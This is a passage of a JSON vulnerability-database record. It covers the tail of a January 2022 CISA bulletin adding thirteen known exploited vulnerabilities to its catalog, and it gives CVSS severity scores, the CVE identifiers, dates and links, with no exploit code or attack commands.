the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}